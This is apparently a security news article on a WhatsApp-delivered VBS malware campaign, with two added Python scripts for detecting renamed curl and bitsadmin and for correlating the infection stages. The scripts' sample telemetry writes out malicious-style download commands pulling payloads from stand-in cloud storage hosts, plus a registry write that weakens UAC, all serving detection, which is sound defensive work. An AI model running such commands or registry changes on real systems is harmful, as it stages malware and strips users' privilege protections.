Microsoft Warns of WhatsApp-Delivered VBS Malware Campaign
Microsoft Defender Experts identify multi-stage malware campaign using WhatsApp messages to deliver VBS scripts that bypass UAC and establish persistent Windows backdoors.
Microsoft is warning of an ongoing malware campaign that uses WhatsApp messages to deliver malicious Visual Basic Script files to Windows users. The Microsoft Defender Experts team has tracked the activity since late February 2026, observing a sophisticated infection chain that combines social engineering with living-off-the-land techniques.
The Attack Chain
The campaign begins with WhatsApp messages containing malicious VBS file attachments. Microsoft hasn't disclosed the specific social engineering lures used to convince victims to execute these scripts, but the attack only works if users manually run the received files.
Once executed, the VBS script creates hidden folders in "C:\ProgramData" and drops renamed copies of legitimate Windows utilities. The attackers rename curl.exe to "netapi.dll" and bitsadmin.exe to "sc.exe"—names that blend with normal Windows system files and evade simple filename-based detection.
These renamed tools then download secondary payloads from cloud storage services including AWS S3, Tencent Cloud, and Backblaze B2. Using legitimate cloud platforms for payload hosting helps attackers evade network-based detection that blocks known malicious domains.
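The two indicators this chain leaves in process-creation telemetry, a PE version resource that still says curl.exe or bitsadmin.exe while the on-disk name says something else, and a downloader launched by a script host that pulls from an object-storage host, can be checked mechanically. The script below is an added example written for this article; it is not code from Microsoft or from the campaign analysis. It reads a constructed, simplified rendering of Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage) as key=value pairs; the watched-utility list and the cloud hostname suffixes are this example's own assumptions and should be tuned to your environment.

```python
"""Detect renamed living-off-the-land utilities in process-creation telemetry.

Added example for this article; not code from Microsoft or the campaign.
Input is a constructed, simplified rendering of Sysmon Event ID 1 fields
(Image, OriginalFileName, CommandLine, ParentImage) as 'key=value' pairs
separated by '|'. Real Sysmon data arrives as EVTX/XML; swap parse_event()
for your collector's format.
"""
import re
from urllib.parse import urlparse

# PE OriginalFileName values to watch. The article names curl.exe and
# bitsadmin.exe; certutil.exe is added here as another common downloader.
WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}

# Script hosts that execute .vbs files.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Hostname suffixes of the object-storage services the article names
# (AWS S3, Tencent Cloud COS, Backblaze B2). Constructed list; extend as needed.
CLOUD_STORAGE_HOST = re.compile(
    r"(\.amazonaws\.com|\.myqcloud\.com|\.backblazeb2\.com)$", re.IGNORECASE
)


def parse_event(line: str) -> dict:
    """Split 'k=v|k=v|...' into a dict. Values may contain '=' but not '|'."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cloud_urls(cmdline: str) -> list:
    """URLs in the command line whose host is a watched cloud-storage service."""
    urls = re.findall(r"https?://[^\s\"']+", cmdline)
    return [u for u in urls if CLOUD_STORAGE_HOST.search(urlparse(u).hostname or "")]


def analyze(event: dict) -> list:
    """Return the reasons an event looks suspicious (empty list if none)."""
    reasons = []
    image = basename(event.get("Image", ""))
    original = event.get("OriginalFileName", "").lower()
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")

    if original in WATCHED_ORIGINALS:
        # The version resource still says curl.exe after the file on disk is
        # renamed; a mismatch is exactly the renaming the article describes.
        if image != original:
            reasons.append(f"renamed utility: {original} running as {image}")
        # A downloader launched directly by a script host fits the VBS chain.
        if parent in SCRIPT_HOSTS:
            reasons.append(f"{original} spawned by script host {parent}")
        # Asks "why is curl pulling a file from S3?", not "is this AWS?".
        for url in cloud_urls(cmdline):
            reasons.append(f"download from cloud object storage: {url}")
    return reasons


def scan(lines) -> list:
    """Run analyze() over raw lines; return (Image, reasons) for each hit."""
    findings = []
    for line in lines:
        event = parse_event(line)
        reasons = analyze(event)
        if reasons:
            findings.append((event.get("Image", ""), reasons))
    return findings


# Constructed sample telemetry: one benign curl, the two renamed tools from
# the article, and a genuine sc.exe that must not be flagged.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\curl.exe|OriginalFileName=curl.exe"
    r"|CommandLine=curl -O https://example.org/tool.zip"
    r"|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\ProgramData\.svchelper\netapi.dll|OriginalFileName=curl.exe"
    r'|CommandLine="C:\ProgramData\.svchelper\netapi.dll" -o '
    r"C:\ProgramData\.svchelper\setup.msi https://update-cdn.s3.amazonaws.com/setup.msi"
    r"|ParentImage=C:\Windows\System32\wscript.exe",
    r"Image=C:\ProgramData\.svchelper\sc.exe|OriginalFileName=bitsadmin.exe"
    r"|CommandLine=sc.exe /transfer upd /download /priority normal "
    r"https://f000.backblazeb2.com/file/update-cdn/stage2.bin C:\ProgramData\.svchelper\stage2.bin"
    r"|ParentImage=C:\Windows\System32\wscript.exe",
    r"Image=C:\Windows\System32\sc.exe|OriginalFileName=sc.exe"
    r"|CommandLine=sc query wuauserv|ParentImage=C:\Windows\System32\cmd.exe",
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(image)
        for reason in reasons:
            print("  -", reason)
```

The genuine sc.exe in the sample passes because its OriginalFileName matches its on-disk name; the renamed bitsadmin.exe does not, which is why the comparison is made against the version resource rather than the filename alone.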
UAC Bypass and Persistence
The malware's most concerning capability is its User Account Control bypass technique. UAC is Windows' primary defense against unauthorized privilege escalation—it's the prompt that asks "Do you want to allow this app to make changes to your device?"
According to Microsoft's analysis, the malware "continuously attempts to launch cmd.exe with elevated privileges, retrying until UAC elevation succeeds." The technique involves registry manipulation targeting specific HKLM\Software\Microsoft\Win entries that control UAC behavior. Once successful, the malware can install unsigned MSI packages without user interaction.
Installing through MSI packages gives the infection persistence that survives system reboots. The attackers also deploy AnyDesk for remote access, giving them an interactive backdoor into compromised systems.
Living Off the Land
The campaign exemplifies the "living off the land" approach that's become standard in sophisticated malware operations. Rather than dropping custom malicious binaries that antivirus might flag, attackers use built-in Windows tools for their dirty work.
Curl handles file downloads. Bitsadmin manages background transfers. MSI packages install persistence components. Every tool is legitimate, signed by Microsoft, and present on virtually every Windows system. The malicious activity comes from how these tools are orchestrated, not from the tools themselves.
This approach mirrors techniques we've covered in the ClickFix campaigns that have spread Vidar and other infostealers. The ClickFix methodology tricks users into running PowerShell commands that chain legitimate tools together maliciously. WhatsApp VBS scripts represent a different delivery mechanism for similar post-exploitation techniques.
Cloud Infrastructure Abuse
The attackers' use of AWS S3, Tencent Cloud, and Backblaze B2 for payload hosting presents a detection challenge. Organizations can't simply block these services—they're used legitimately by thousands of applications. And the cloud providers can't easily distinguish malicious uploads from legitimate file storage.
This infrastructure abuse has accelerated across the threat landscape. Cloud services offer:
- High availability and fast delivery
- Trusted SSL certificates
- Resistance to takedown (legitimate services don't get blocklisted)
- Easy provisioning of new storage buckets when old ones are flagged
Security teams need to shift from domain-based blocking to behavior-based detection. The question isn't "is this traffic going to AWS?" but "why is curl downloading an MSI package from S3 at 3 AM?"
Why WhatsApp?
Messaging-based malware delivery has surged as email filtering has improved. Enterprise email gateways now catch most malicious attachments before they reach users. WhatsApp messages bypass that entire infrastructure.
Personal WhatsApp accounts on work devices—or WhatsApp Web on corporate systems—create attack paths that corporate security controls don't monitor. Users may be more trusting of messages from apparent contacts than they would be of email from unknown senders.
The Storm infostealer we covered recently also exploited messaging platforms for initial access, suggesting threat actors are systematically exploring alternatives to traditional email phishing.
Recommendations
Microsoft recommends the following defensive measures:
- Disable VBS execution by default - Group Policy can prevent script host execution for users who don't need it
- Monitor for renamed system utilities - Curl.exe shouldn't be named netapi.dll
- Alert on UAC registry modifications - Legitimate software rarely touches these keys
- Block script execution from user-writable locations - AppLocker or Windows Defender Application Control can help
- Educate users about messaging-based threats - WhatsApp isn't safer than email for receiving files
For organizations that can't completely block VBS execution, behavioral detection becomes critical. The sequence of events—VBS execution, hidden folder creation, utility renaming, cloud downloads, UAC modification—should trigger alerts even if individual actions appear benign.
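The sequence-based detection the paragraph above calls for, and the UAC registry alerting in the recommendations, can be expressed as a per-host correlator that scores how many distinct stages of the chain occur within a time window. The code below is an added example, not code from the article or from Microsoft Defender. Events are constructed dicts standing in for normalized endpoint telemetry (process creation, directory creation, registry value set), and the field names are this example's own. The UAC policy key and value names used for the registry stage are the standard Windows UAC settings and are an assumption here, since the article does not spell out the exact entries the malware touches.

```python
"""Correlate the stages of the WhatsApp-VBS chain per host.

Added example, not code from the article or from Microsoft Defender. Events
are constructed dicts standing in for normalized endpoint telemetry; field
names are this example's own. The UAC policy key and value names are the
standard Windows UAC settings, used as an assumption since the article does
not name the exact entries.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# The sequence the article says should alert as a whole.
STAGE_ORDER = ["script_host", "hidden_dir", "renamed_util",
               "cloud_download", "uac_registry"]
WINDOW = timedelta(minutes=30)   # how close in time the stages must be
MIN_STAGES = 3                   # distinct stages required before alerting

WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe"}
CLOUD_SUFFIXES = (".amazonaws.com", ".myqcloud.com", ".backblazeb2.com")
UAC_POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
UAC_VALUES = {"EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: dict) -> set:
    """Map one event to the chain stages it evidences (none, one or several)."""
    stages = set()
    if ev["type"] == "process":
        image = _base(ev["image"])
        cmd = ev.get("cmdline", "").lower()
        original = ev.get("original", "").lower()
        if image in ("wscript.exe", "cscript.exe") and ".vbs" in cmd:
            stages.add("script_host")
        if original in WATCHED_ORIGINALS:
            if image != original:            # on-disk name != PE OriginalFileName
                stages.add("renamed_util")
            if any(s in cmd for s in CLOUD_SUFFIXES):
                stages.add("cloud_download")
    elif ev["type"] == "dir_create":
        if ev["path"].lower().startswith("c:\\programdata\\") and \
                "hidden" in ev.get("attributes", ()):
            stages.add("hidden_dir")
    elif ev["type"] == "registry_set":
        key, _, value = ev["target"].rpartition("\\")
        if key.lower() == UAC_POLICY_KEY.lower() and value in UAC_VALUES:
            stages.add("uac_registry")
    return stages


def correlate(events, window=WINDOW, min_stages=MIN_STAGES) -> list:
    """One alert per host whose events cover >= min_stages distinct stages
    inside some window-sized interval; the densest interval is reported."""
    by_host = defaultdict(list)
    for ev in events:
        for stage in classify(ev):
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))

    alerts = []
    for host, staged in by_host.items():
        staged.sort()
        best = None
        for i, (t0, _) in enumerate(staged):
            seen = {}
            for t, stage in staged[i:]:
                if t - t0 > window:
                    break
                seen.setdefault(stage, t)      # first time each stage appears
            if len(seen) >= min_stages and (best is None or len(seen) > best["score"]):
                best = {"host": host, "start": t0.isoformat(), "score": len(seen),
                        "stages": sorted(seen, key=STAGE_ORDER.index)}
        if best:
            alerts.append(best)
    return alerts


# Constructed sample telemetry. WS-42 shows the full chain inside six minutes;
# WS-07 has only a logon script and an ordinary curl, and must stay quiet.
SAMPLE_EVENTS = [
    {"ts": "2026-03-02T10:00:05", "host": "WS-42", "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\dana\Downloads\Invoice_2026.vbs"'},
    {"ts": "2026-03-02T10:00:09", "host": "WS-42", "type": "dir_create",
     "path": r"C:\ProgramData\.svchelper", "attributes": ["hidden", "system"]},
    {"ts": "2026-03-02T10:00:31", "host": "WS-42", "type": "process",
     "image": r"C:\ProgramData\.svchelper\netapi.dll", "original": "curl.exe",
     "cmdline": r"netapi.dll -o C:\ProgramData\.svchelper\setup.msi "
                r"https://update-cdn.s3.amazonaws.com/setup.msi"},
    {"ts": "2026-03-02T10:05:40", "host": "WS-42", "type": "registry_set",
     "target": UAC_POLICY_KEY + r"\ConsentPromptBehaviorAdmin", "data": "0"},
    {"ts": "2026-03-02T10:01:00", "host": "WS-07", "type": "process",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //nologo \\fileserver\netlogon\mapdrives.vbs"},
    {"ts": "2026-03-02T10:02:15", "host": "WS-07", "type": "process",
     "image": r"C:\Windows\System32\curl.exe", "original": "curl.exe",
     "cmdline": "curl -sS https://example.org/status"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Each individual stage is weak on its own (logon scripts run from cscript.exe all day, and a hidden folder under ProgramData is not unusual), which is why the alert threshold is on the number of distinct stages within the window rather than on any single event; raising MIN_STAGES or shrinking WINDOW trades recall for fewer false positives.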